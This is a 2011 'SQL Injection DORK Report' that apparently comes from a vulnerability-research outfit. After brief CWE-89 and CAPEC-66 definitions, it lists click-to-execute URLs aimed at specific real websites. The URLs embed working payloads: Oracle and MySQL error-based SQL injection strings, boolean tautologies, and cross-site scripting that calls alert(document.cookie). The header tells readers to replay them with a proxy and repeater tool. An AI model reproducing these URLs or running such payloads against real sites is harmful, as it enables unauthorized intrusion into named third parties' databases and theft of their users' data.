The SQL Injection DORK Report


.	AUTHOR: Hoyt LLC Research
.	CAPEC-66: SQL Injection
.	CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
.	SQL Injection DORK Click to Execute URI's
.	Last Updated: Match 3, 2011 1354 GMT
.	Description: Spreadsheet of Unforgivable Vulnerabilities in URI Format
.	HOW TO: Use a Proxy and Repeater tool such as ZAPROXY!
.	CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
.	The software constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component.
.
.
.	http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/?siteId=1860&syndicationOutletId=47146&campaignId=6330&adRotationId=1512135c2d%3Cscript%3Ealert(document.cookie)%3C/script%3Ea400b254f48&bannerCreativeAdModuleId=21152&redirect=http://ar.voicefive.com/b/recruitBeacon.pli%3fpid%3dp84532700%26PRAd%3d47146%26AR_C%3d34917
.	http://www.outsourcingdotnetdevelopment.com/outsourcing-dot-net-development-contact-us.html
.	http://xhtml.co.il/he/page-700'/jQuery
.	http://xhtml.co.il/ru/page-1013'/jQuery.browser
.	http://reg.accelacomm.com/servlet/Frs.frs?Context=LOGENTRY&Source=csoznee4778';alert(1)&Source_BC=&Script=/LP/c8ec899850f/reg'&10/50552781/_from=cso
.	http://www.sti-cs.com/Portfolio/Trades-and-Exhibits/id-24c8e9b%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea1374672bac/page-1/
.	http://response.restoration.noaa.gov/favicon.ico'
.	http://recs.richrelevance.com/rrserver'/p13n_generated.js?a=5387d7af823640a7&ts=1298696012699&pte=t&cn=women&c=70656&pt=\|category_page&s=610713bc749cf4d34b532d430bfb19afaxMnVNoVzaGoxMnVNoVzaGW200BDDB78D40746D2B91C5B5BCF5317AD0AE1105704&pref=http://www.jcpenney.com/jcp/default.aspx&l=1
.	http://qap.questcdn.com/qap/projects/prj_browse/ipp_prj_browse_letting_date.html?group=(utl_inaddr.get_host_address((select+chr(95)\|\|chr(33)\|\|chr(64)\|\|chr(51)\|\|chr(100)\|\|chr(105)\|\|chr(108)\|\|chr(101)\|\|chr(109)\|\|chr(109)\|\|chr(97)+from+DUAL)))&provider=765295


.	http://www.venrock.com/index.cfm?fuseaction=content.contentDetail&id=8955'
.	http://qap.questcdn.com/qap/action/IPPshowProjData?jobCategoryNo=324403&group=(utl_inaddr.get_host_address((select+chr(95)\|\|chr(33)\|\|chr(64)\|\|chr(51)\|\|chr(100)\|\|chr(105)\|\|chr(108)\|\|chr(101)\|\|chr(109)\|\|chr(109)\|\|chr(97)+from+DUAL)))&provider=453856&sortType=0&jobNo=1464405
.	http://qap.questcdn.com/qap/projects/prj_browse/ipp_prj_browse_letting_date.html?jobCategoryNo=03/03/2011&group=(utl_inaddr.get_host_address((select+chr(95)\|\|chr(33)\|\|chr(64)\|\|chr(51)\|\|chr(100)\|\|chr(105)\|\|chr(108)\|\|chr(101)\|\|chr(109)\|\|chr(109)\|\|chr(97)+from+DUAL)))&provider=765295&sortType=1
.	http://qap.questcdn.com/qap/projects/prj_browse/ipp_login.html?jobCategoryNo=1048445&provider=453856&jobNo=(utl_inaddr.get_host_address((select+chr(95)\|\|chr(33)\|\|chr(64)\|\|chr(51)\|\|chr(100)\|\|chr(105)\|\|chr(108)\|\|chr(101)\|\|chr(109)\|\|chr(109)\|\|chr(97)+from+DUAL)))&caller=projects/prj_browse/ipp_prj_browse_f.html&caller_params=3
.	http://www.caribbean-ocean.com/countries2.php?id=-1+OR+17-7%3d10
.	http://www.caribbean-ocean.com/countries2.php?id=(select+1+and+row(1,1)%3E(select+count(),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))
.	http://cdn.goodwaygroup.com/DDLImpression.asp?IPAddress='&flight=-&versionId=2&DARTCampaignId=5167576&userZip=10001&onLoad=[type%20Function]